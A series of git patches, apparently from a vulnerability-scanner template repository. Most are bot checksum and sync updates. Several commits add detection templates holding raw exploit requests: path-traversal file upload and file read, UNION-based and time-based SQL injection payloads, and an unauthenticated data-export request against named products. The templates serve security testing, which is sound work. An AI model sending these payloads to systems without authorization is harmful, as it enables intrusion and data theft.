http/misconfiguration/installer/piwigo-installer.yaml http/misconfiguration/installer/poste-io-installer.yaml http/misconfiguration/installer/subrion-installer.yaml +http/misconfiguration/label-studio-signup.yaml http/misconfiguration/seq-dashboard-unath.yaml http/technologies/apache/apache-pinot-detect.yaml http/technologies/neo4j-neodash-detect.yaml From 112ba38b3c1bf705278262cbbbed255f2dbfbe8d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 8 Jul 2024 17:06:21 +0000 Subject: [PATCH 0978/1841] Auto Generated Templates Checksum [Mon Jul 8 17:06:21 UTC 2024] :robot: --- templates-checksum.txt | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 964a69db71..1cd433fe67 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3185,6 +3185,7 @@ http/cves/2023/CVE-2023-35078.yaml:4986f8899e309eabfe7de47ac607fc17bc6e2306 http/cves/2023/CVE-2023-35082.yaml:37ad71a404ca250f882e69f45503631e001653a2 http/cves/2023/CVE-2023-35156.yaml:72c2e061bd7264a8e88e39bed12978ba41608ad8 http/cves/2023/CVE-2023-35158.yaml:76d09942bb434d541e43eb224218c181af2a2f1f +http/cves/2023/CVE-2023-35159.yaml:4731de3bf42d2357bce1a099356b1812121e06ed http/cves/2023/CVE-2023-35160.yaml:18c32e9c618ae99d50b0d2772e2196b575e2ba36 http/cves/2023/CVE-2023-35161.yaml:3d76e95e4d9eda1ca30d6f463c478b49d420282e http/cves/2023/CVE-2023-35162.yaml:b3c53552dcd6e3ef5ee198684f10ef0eec25f283 @@ -3468,7 +3469,7 @@ http/cves/2024/CVE-2024-36401.yaml:9ce37b567a44a508495f69a3ecda745d30a6dcd1 http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff http/cves/2024/CVE-2024-36527.yaml:eb2651a0ee32128fdfe8ae24c72f5d61a1a7f68e http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 -http/cves/2024/CVE-2024-36991.yaml:413e3956938d8c1037408b35793641d623fcbedb +http/cves/2024/CVE-2024-36991.yaml:871d08f99d501e2b11dcdb2329dc31bdc6c50cf6 http/cves/2024/CVE-2024-37152.yaml:45b7e5ca110853fe4cca80588d33d140f611d1e2 http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd http/cves/2024/CVE-2024-37881.yaml:060af3bf51e4ab05684d4923658d02b3c49583bb @@ -4207,6 +4208,7 @@ http/exposed-panels/kubernetes-enterprise-manager.yaml:301e583ab29f38845e3f2a3bf http/exposed-panels/kubernetes-mirantis.yaml:a6c0cb37f6236c31abc9abc66203287f3472ca1f http/exposed-panels/kubernetes-web-view.yaml:cb26942f509ff217b06fbba0b161722f84d73a01 http/exposed-panels/kubeview-dashboard.yaml:1b71d18b85609b07a745b5484d3f19e731d70cf4 +http/exposed-panels/label-studio-panel.yaml:29126ae5c2392d5711ba8620c405f792824db6ec http/exposed-panels/labkey-server-login.yaml:f9fd45b35a87971398e6310809351538e12a8024 http/exposed-panels/labtech-panel.yaml:f1d86b82c3030894eeea5866bde98f51bbf63af5 http/exposed-panels/lacie-panel.yaml:f105dc22138769cd5b966bdb325b84dd44f8c641 @@ -5915,7 +5917,7 @@ http/misconfiguration/springboot/springboot-autoconfig.yaml:5ab7cca4905655689b31 http/misconfiguration/springboot/springboot-beans.yaml:3c4b0fbef57ee0101fa37ef4ff146c1b2f3aeebb http/misconfiguration/springboot/springboot-caches.yaml:a14993ca11f0ed7245503a6cacb6f1c7575c2b3d http/misconfiguration/springboot/springboot-conditions.yaml:e213f4eeeed314b4c5516c7564cb1f2c9603c3e8 -http/misconfiguration/springboot/springboot-configprops.yaml:540c4a4ad4b1839c9f91f762670ecd05f9c1a6a5 +http/misconfiguration/springboot/springboot-configprops.yaml:c2bdb49d8fb6e2a31d88c8b86aae98d088736742 http/misconfiguration/springboot/springboot-dump.yaml:c55a2d775ad9fcd314c944b54eccf66d9b15e2b0 http/misconfiguration/springboot/springboot-env.yaml:e791c93cd12850fb6b09ef1bb8265e6daae8b249 http/misconfiguration/springboot/springboot-features.yaml:dd0e6d636478dd611bb4a591e5d4deff0879b4bd @@ -8844,7 +8846,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:00b4a21e54c4cc54e7b74be2622e751d7c091f41 +templates-checksum.txt:efd53b8719c0273dfea67b31978cd73b0bfad0c2 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From cd0527c95d9985eed9eed486ff4c8c6a46c984ab Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 8 Jul 2024 17:06:57 +0000 Subject: [PATCH 0980/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3244be4d20..be3deb1d2e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -37,6 +37,7 @@ on: - 'http/exposed-panels/apache/apache-apollo-panel.yaml' - 'http/exposed-panels/dialogic-xms-console.yaml' - 'http/exposed-panels/endpoint-protector-panel.yaml' + - 'http/exposed-panels/label-studio-panel.yaml' - 'http/exposures/backups/sql-server-dump.yaml' - 'http/exposures/configs/apache-pinot-config.yaml' - 'http/exposures/configs/filestash-admin-config.yaml' @@ -47,6 +48,7 @@ on: - 'http/misconfiguration/installer/piwigo-installer.yaml' - 'http/misconfiguration/installer/poste-io-installer.yaml' - 'http/misconfiguration/installer/subrion-installer.yaml' + - 'http/misconfiguration/label-studio-signup.yaml' - 'http/misconfiguration/seq-dashboard-unath.yaml' - 'http/technologies/apache/apache-pinot-detect.yaml' - 'http/technologies/neo4j-neodash-detect.yaml' From 513c11d518127ae41e4b2f7fee10b69633e36d1a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 8 Jul 2024 17:07:11 +0000 Subject: [PATCH 0981/1841] Auto Generated New Template Addition List [Mon Jul 8 17:07:11 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4141751518..7c7ea51bc5 100644 --- a/.new-additions +++ b/.new-additions @@ -8,6 +8,7 @@ http/cves/2023/CVE-2023-35159.yaml http/cves/2023/CVE-2023-35160.yaml http/cves/2023/CVE-2023-35161.yaml http/cves/2023/CVE-2023-41599.yaml +http/cves/2023/CVE-2023-47117.yaml http/cves/2023/CVE-2023-52251.yaml http/cves/2024/CVE-2024-27292.yaml http/cves/2024/CVE-2024-29972.yaml From f265a899623e52c9b94b10d820d3bbb6d4087c83 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 8 Jul 2024 17:07:17 +0000 Subject: [PATCH 0982/1841] Auto Generated Templates Checksum [Mon Jul 8 17:07:17 UTC 2024] :robot: --- templates-checksum.txt | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1cd433fe67..b24f79f957 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3309,6 +3309,7 @@ http/cves/2023/CVE-2023-46732.yaml:c877d0e1689f2fb8d52ddd715d165ead948f349d http/cves/2023/CVE-2023-46747.yaml:8034386aab766649cefb93c12ae6cd42ae1b09d9 http/cves/2023/CVE-2023-46805.yaml:1b2422c71b91214c98e03d968a0f8bc7db02914b http/cves/2023/CVE-2023-47115.yaml:f5f0d4869bc075f448f560f87f29febd4cc63497 +http/cves/2023/CVE-2023-47117.yaml:faf95a8966811e2950ba13e99d26f923afc78d2f http/cves/2023/CVE-2023-4714.yaml:ded522e184551747912d5a2c70df1be0bb4cc545 http/cves/2023/CVE-2023-47211.yaml:57a479e903db82adc0b54fced6f541a6fe9a7961 http/cves/2023/CVE-2023-47218.yaml:ba61fc9e686e0c5f28048e666320fccb7bef32aa @@ -5786,6 +5787,7 @@ http/misconfiguration/kubernetes/kubernetes-metrics.yaml:5f8fbe53b2d93640b7c2c58 http/misconfiguration/kubernetes/kubernetes-pods.yaml:a59825a464f006e6da0ce5b7232bf24c9f60c705 http/misconfiguration/kubernetes/kubernetes-resource-report.yaml:2d7acc9dc9c77424c09ebd95f6f44206567f9a5a http/misconfiguration/kubernetes/unauth-etcd-server.yaml:178a6e16adb8beb36acd4ae83cd91805bae9a032 +http/misconfiguration/label-studio-signup.yaml:657ccc71d1a45614f489dcd68b65d01fed8429ca http/misconfiguration/laravel-debug-enabled.yaml:b004de4a3fc780b77d514df43a916384be075f93 http/misconfiguration/laravel-debug-error.yaml:a52cdf861755ac8b258cf35a31d15b11a04fe8bb http/misconfiguration/laravel-debug-infoleak.yaml:18a8a3ab5ba1a8d728fe9fad0073d6fd378a97ae @@ -8846,7 +8848,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:efd53b8719c0273dfea67b31978cd73b0bfad0c2 +templates-checksum.txt:6fc7014d1005d9a1c0f68f4398ee7b9d568b2cd6 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b02402f99c57c29b34c11d36f986727e0e6ea444 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 8 Jul 2024 17:07:59 +0000 Subject: [PATCH 0983/1841] Auto Template Signing [Mon Jul 8 17:07:59 UTC 2024] :robot: --- http/cves/2023/CVE-2023-35159.yaml | 1 + http/cves/2023/CVE-2023-35161.yaml | 1 + http/exposed-panels/label-studio-panel.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/http/cves/2023/CVE-2023-35159.yaml b/http/cves/2023/CVE-2023-35159.yaml index d8a0953e1c..4185e51903 100644 --- a/http/cves/2023/CVE-2023-35159.yaml +++ b/http/cves/2023/CVE-2023-35159.yaml @@ -54,3 +54,4 @@ http: status: - 200 - 401 +# digest: 4a0a0047304502202be07a127aa55d3394efcd2fd59ecadf7a8406b29a310e7cc7501b66790c5d86022100d893c80ab2689f44a6e10b16ea35c12232013b98598d07cdf7d4b0710c5654a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-35161.yaml b/http/cves/2023/CVE-2023-35161.yaml index 53b34a98fc..4fc0f733c1 100644 --- a/http/cves/2023/CVE-2023-35161.yaml +++ b/http/cves/2023/CVE-2023-35161.yaml @@ -54,3 +54,4 @@ http: status: - 200 - 401 +# digest: 490a004630440220754ce20184edbf704cd6f1e7e69a70f61dfa7503c16e166e04bb380a7576fca7022040bb69bfb99ba4aa9a3465fc7765917ae85b4e2f6fcd05c3789e9b5b41468356:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/label-studio-panel.yaml b/http/exposed-panels/label-studio-panel.yaml index 5f72d1120b..6c0ea641c9 100644 --- a/http/exposed-panels/label-studio-panel.yaml +++ b/http/exposed-panels/label-studio-panel.yaml @@ -30,3 +30,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100da0538ebf234b3ca93efd0bf3045e2a8b6c49395e974ac845148157e7c3cd9ce02206fac9755a420d427132aab8074e5a88f112ac6a1388cf9c565946cd101acf5be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 072aeb90e54e105ac04cb896029ca4cfe8520f6b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 8 Jul 2024 17:08:00 +0000 Subject: [PATCH 0984/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index be3deb1d2e..388c763b4e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -13,6 +13,7 @@ on: - 'http/cves/2023/CVE-2023-35160.yaml' - 'http/cves/2023/CVE-2023-35161.yaml' - 'http/cves/2023/CVE-2023-41599.yaml' + - 'http/cves/2023/CVE-2023-47117.yaml' - 'http/cves/2023/CVE-2023-52251.yaml' - 'http/cves/2024/CVE-2024-27292.yaml' - 'http/cves/2024/CVE-2024-29972.yaml' From f7c6b9688036656fde8a488dd2632f93350eb562 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 9 Jul 2024 01:44:30 +0300 Subject: [PATCH 0985/1841] add CVE-2024-6188 --- http/cves/2024/CVE-2024-6188.yaml | 47 +++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 http/cves/2024/CVE-2024-6188.yaml diff --git a/http/cves/2024/CVE-2024-6188.yaml b/http/cves/2024/CVE-2024-6188.yaml new file mode 100644 index 0000000000..4bd6c38aeb --- /dev/null +++ b/http/cves/2024/CVE-2024-6188.yaml @@ -0,0 +1,47 @@ +id: CVE-2024-6188 + +info: + name: TrakSYS 11.x.x - Sensitive Data Exposure + author: securityforeveryone + severity: medium + description: | + A vulnerability was found in Parsec Automation TrackSYS 11.x.x and classified as problematic. This issue affects some unknown processing of the file /TS/export/pagedefinition. The manipulation of the argument ID leads to direct request. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. + impact: An attacker is able to export the source code of the pages without having any credentials to access the application. + reference: + - https://kiwiyumi.com/post/tracksys-export-source-code/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-6188 + - https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-6188 + - https://debricked.com/vulnerability-database/vulnerability/CVE-2024-6188 + metadata: + verified: true + max-request: 1 + vendor: Parsec Automation + product: TrackSYS + tags: cve,cve2024,traksys,idor,info-leak + +http: + - raw: + - | + GET /TS/export/pagedefinition?ID=1 HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'TrakSYS Version' + - 'Name' + - 'Altname' + - 'Notes' + - 'Key' + condition: and + + - type: word + part: header + words: + - 'Content-Disposition: attachment; filename="PageDefinition_Home.pdef"' + + - type: status + status: + - 200 From e184f76d61a9ded80f17d7152f44696383dd56c3 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 9 Jul 2024 01:51:11 +0300 Subject: [PATCH 0986/1841] add h3c campus arbitrary file upload --- .../h3c-cnsss-arbitrary-file-upload.yaml | 44 +++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml diff --git a/http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml b/http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml new file mode 100644 index 0000000000..cc9634498e --- /dev/null +++ b/http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml @@ -0,0 +1,44 @@ +id: h3c-cnsss-arbitrary-file-upload +info: + name: H3C CNSSS - Arbitrary File Upload + author: securityforeveryone + severity: critical + description: | + H3C-Campus Network Self-Service System vulnerability allows for arbitrary file uploads. This enables attackers to upload any files they choose, acquire webshells, manipulate server permissions, and access sensitive information. + reference: + - https://github.com/wy876/POC/blob/main/H3C-%E6%A0%A1%E5%9B%AD%E7%BD%91%E8%87%AA%E5%8A%A9%E6%9C%8D%E5%8A%A1%E7%B3%BB%E7%BB%9Fflexfileupload%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + fofa-query: header="/selfservice" + tags: h3c,lfi,instrusive,file-upload + +variables: + filename: "{{rand_base(10)}}" + num: "{{rand_int(1000, 9999)}}" + +http: + - raw: + - | + POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------WebKitFormBoundaryMmx988TUuintqO4Q + + -----------------WebKitFormBoundaryMmx988TUuintqO4Q + Content-Disposition: form-data; name="{{filename}}.txt"; filename="{{filename}}.txt" + Content-Type: application/octet-stream + + {{md5(num)}} + -----------------WebKitFormBoundaryMmx988TUuintqO4Q-- + + - | + GET /imc/primepush/%2e%2e/flex/topobg/{{filename}}.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body_2,"{{md5(num)}}")' + - 'status_code_1 == 200 && status_code_2 == 200' + condition: and + From 81f5ace3e7af813c43596b8175142363a03e5d7c Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 9 Jul 2024 01:54:45 +0300 Subject: [PATCH 0987/1841] add hj-hcm-lfi --- .../vulnerabilities/other/hjsoft-hcm-lfi.yaml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/vulnerabilities/other/hjsoft-hcm-lfi.yaml diff --git a/http/vulnerabilities/other/hjsoft-hcm-lfi.yaml b/http/vulnerabilities/other/hjsoft-hcm-lfi.yaml new file mode 100644 index 0000000000..4d19cd337c --- /dev/null +++ b/http/vulnerabilities/other/hjsoft-hcm-lfi.yaml @@ -0,0 +1,36 @@ +id: hjsoft-hcm-lfi + +info: + name: Hongjing HCM - Local File Inclusion + author: securityforeveryone + severity: critical + description: | + There is an arbitrary file read vulnerability in the Hongjing eHR /DownLoadCourseware interface. Unauthenticated attackers can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc., causing the website to be extremely unsafe. + reference: + - https://github.com/wy876/POC/blob/main/%E5%AE%8F%E6%99%AFeHR%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3DownLoadCourseware%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + - https://blog.csdn.net/qq_41904294/article/details/140180110 + metadata: + verified: true + max-request: 1 + fofa-query: app="HJSOFT-HCM" + tags: lfi,hjsoft,management-system,file-read + +http: + - raw: + - | + GET /w_selfservice/oauthservlet/%2e./.%2e/DownLoadCourseware?url=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - "bit app support" + - "[fonts]" + - "[extensions]" + - "[files]" + condition: and + + - type: status + status: + - 200 From 0093196d07890a0262180257b2ac19d81776b360 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 9 Jul 2024 01:57:13 +0300 Subject: [PATCH 0988/1841] fix --- .../vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml b/http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml index cc9634498e..35c4c20058 100644 --- a/http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml @@ -40,5 +40,4 @@ http: dsl: - 'contains(body_2,"{{md5(num)}}")' - 'status_code_1 == 200 && status_code_2 == 200' - condition: and - + condition: and \ No newline at end of file From ddd5c47f6f1629b7a8ca532f722633fecd363db3 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 9 Jul 2024 01:58:28 +0300 Subject: [PATCH 0989/1841] fix-2 --- http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml b/http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml index 35c4c20058..4c26f4d053 100644 --- a/http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml @@ -40,4 +40,4 @@ http: dsl: - 'contains(body_2,"{{md5(num)}}")' - 'status_code_1 == 200 && status_code_2 == 200' - condition: and \ No newline at end of file + condition: and From e78ff0c75d3a0a7b330062b223c54eea284af82f Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 9 Jul 2024 02:01:27 +0300 Subject: [PATCH 0990/1841] add hj-hcm-sqli --- .../other/hjsoft-hcm-sqli.yaml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 http/vulnerabilities/other/hjsoft-hcm-sqli.yaml diff --git a/http/vulnerabilities/other/hjsoft-hcm-sqli.yaml b/http/vulnerabilities/other/hjsoft-hcm-sqli.yaml new file mode 100644 index 0000000000..6d06152f65 --- /dev/null +++ b/http/vulnerabilities/other/hjsoft-hcm-sqli.yaml @@ -0,0 +1,30 @@ +id: hjsoft-hcm-sqli + +info: + name: Hongjing HCM - Sql Injection + author: securityforeveryone + severity: critical + description: | + There is a SQL injection vulnerability in the /servlet/sduty/getSdutyTree interface of Hongjing HCM. Unauthenticated remote attackers can execute arbitrary commands by exploiting the SQL injection vulnerability with the database xp_cmdshell, thereby controlling the server. + reference: + - https://github.com/wy876/POC/blob/main/%E5%AE%8F%E6%99%AFeHR%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3getSdutyTree%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + - https://blog.csdn.net/qq_41904294/article/details/140172351 + - https://www.ddpoc.com/DVB-2024-7391.html + metadata: + verified: true + max-request: 1 + fofa-query: app="HJSOFT-HCM" + tags: sqli,hjsoft,management-system + +http: + - raw: + - | + GET /w_selfservice/oauthservlet/%2e./.%2e/servlet/sduty/getSdutyTree?param=child&target=1&codesetid=1&codeitemid=1%27+UNION+ALL+SELECT+NULL%2CCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28119%29%2BCHAR%2885%29%2BCHAR%2873%29%2BCHAR%2887%29%2BCHAR%2899%29%2BCHAR%2875%29%2BCHAR%28116%29%2BCHAR%2872%29%2BCHAR%28113%29%2BCHAR%28104%29%2BCHAR%28107%29%2BCHAR%2889%29%2BCHAR%28115%29%2BCHAR%28108%29%2BCHAR%2873%29%2BCHAR%2884%29%2BCHAR%2869%29%2BCHAR%2873%29%2BCHAR%2875%29%2BCHAR%2883%29%2BCHAR%2898%29%2BCHAR%28116%29%2BCHAR%28120%29%2BCHAR%2889%29%2BCHAR%2884%29%2BCHAR%2882%29%2BCHAR%28120%29%2BCHAR%2884%29%2BCHAR%28116%29%2BCHAR%2888%29%2BCHAR%28112%29%2BCHAR%2887%29%2BCHAR%2873%29%2BCHAR%28109%29%2BCHAR%28104%29%2BCHAR%2887%29%2BCHAR%28102%29%2BCHAR%2897%29%2BCHAR%2877%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28113%29%2CNULL%2CNULL--+Iprd HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"qxjpqjwUIWcKtHqhkYslITEIKSbtxYTRxTtXpWImhWfaMqvjzq","root","codeitem")' + - 'status_code == 200' + condition: and From 5946223c52a1f1274359279cc5408bfd5a1d239f Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 9 Jul 2024 02:05:52 +0300 Subject: [PATCH 0991/1841] add hj time based sqli --- .../other/hjsoft-hcm-tb-sqli.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 http/vulnerabilities/other/hjsoft-hcm-tb-sqli.yaml diff --git a/http/vulnerabilities/other/hjsoft-hcm-tb-sqli.yaml b/http/vulnerabilities/other/hjsoft-hcm-tb-sqli.yaml new file mode 100644 index 0000000000..fa50dd89ee --- /dev/null +++ b/http/vulnerabilities/other/hjsoft-hcm-tb-sqli.yaml @@ -0,0 +1,28 @@ +id: hjsoft-hcm-tb-sqli +info: + name: Hongjing HCM - Time-Based Sql Injection + author: securityforeveryone + severity: critical + description: | + There is a SQL injection vulnerability in the /gz/LoadOtherTreeServlet interface of Hongjing HCM. Unauthenticated remote attackers can use the SQL injection vulnerability with the database xp_cmdshell to execute arbitrary commands and control the server. After analysis and judgment, the vulnerability is easy to exploit and it is recommended to be fixed as soon as possible. + reference: + - https://github.com/wy876/POC/blob/main/%E5%AE%8F%E6%99%AFeHR%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3LoadOtherTreeServlet%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + fofa-query: app="HJSOFT-HCM" + tags: sqli,time-based-sqli,hjsoft,management-system + +http: + - raw: + - | + @timeout: 20s + GET /w_selfservice/oauthservlet/%2e./.%2e/gz/LoadOtherTreeServlet?modelflag=4&budget_id=1%29%3BWAITFOR+DELAY+%270%3A0%3A6%27--&flag=1 HTTP/1.1 + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'contains_all(body,"root","title","text","?xml version")' + - 'status_code == 200' + condition: and From 849b0a88b4dff07a0911b93d3f2d4ec517eaa55d Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 9 Jul 2024 02:11:54 +0300 Subject: [PATCH 0992/1841] add pingsheng sqli --- .../other/pingsheng-electronic-sqli.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/vulnerabilities/other/pingsheng-electronic-sqli.yaml diff --git a/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml new file mode 100644 index 0000000000..f69a00a4cd --- /dev/null +++ b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml @@ -0,0 +1,33 @@ +id: pingsheng-electronic-sqli + +info: + name: Pingsheng Electronic Reservoir Supervision Platform - Sql Injection + author: securityforeveryone + severity: critical + description: | + There is a SQL injection vulnerability in the GetAllRechargeRecordsBySIMCardId interface of Pingsheng Electronic Reservoir Supervision Platform. Attackers can access data in the database without authorization, thereby stealing user data and causing user information leakage. + reference: + - https://github.com/wy876/POC/blob/main/%E5%B9%B3%E5%8D%87%E7%94%B5%E5%AD%90%E6%B0%B4%E5%BA%93%E7%9B%91%E7%AE%A1%E5%B9%B3%E5%8F%B0GetAllRechargeRecordsBySIMCardId%E6%8E%A5%E5%8F%A3%E5%A4%84%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + fofa-query: "js/PSExtend.js" + tags: sqli,pingsheng + +http: + - raw: + - | + @timeout 20s + POST /WebServices/SIMMaintainService.asmx/GetAllRechargeRecordsBySIMCardId HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + loginIdentifer=&simcardId=';WAITFOR DELAY '0:0:6'-- + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'contains_all(body,"Result","false","Message","?xml version")' + - 'status_code == 200' + condition: and From 9f3725ff06d3ae4934c437786acce630f27509df Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Jul 2024 00:19:32 +0000 Subject: [PATCH 0993/1841] Auto WordPress Plugins Update [Tue Jul 9 00:19:32 UTC 2024] :robot: --- helpers/wordpress/plugins/gdpr-cookie-compliance.txt | 2 +- helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt | 2 +- helpers/wordpress/plugins/google-analytics-for-wordpress.txt | 2 +- helpers/wordpress/plugins/image-optimization.txt | 2 +- helpers/wordpress/plugins/newsletter.txt | 2 +- helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt | 2 +- helpers/wordpress/plugins/under-construction-page.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - 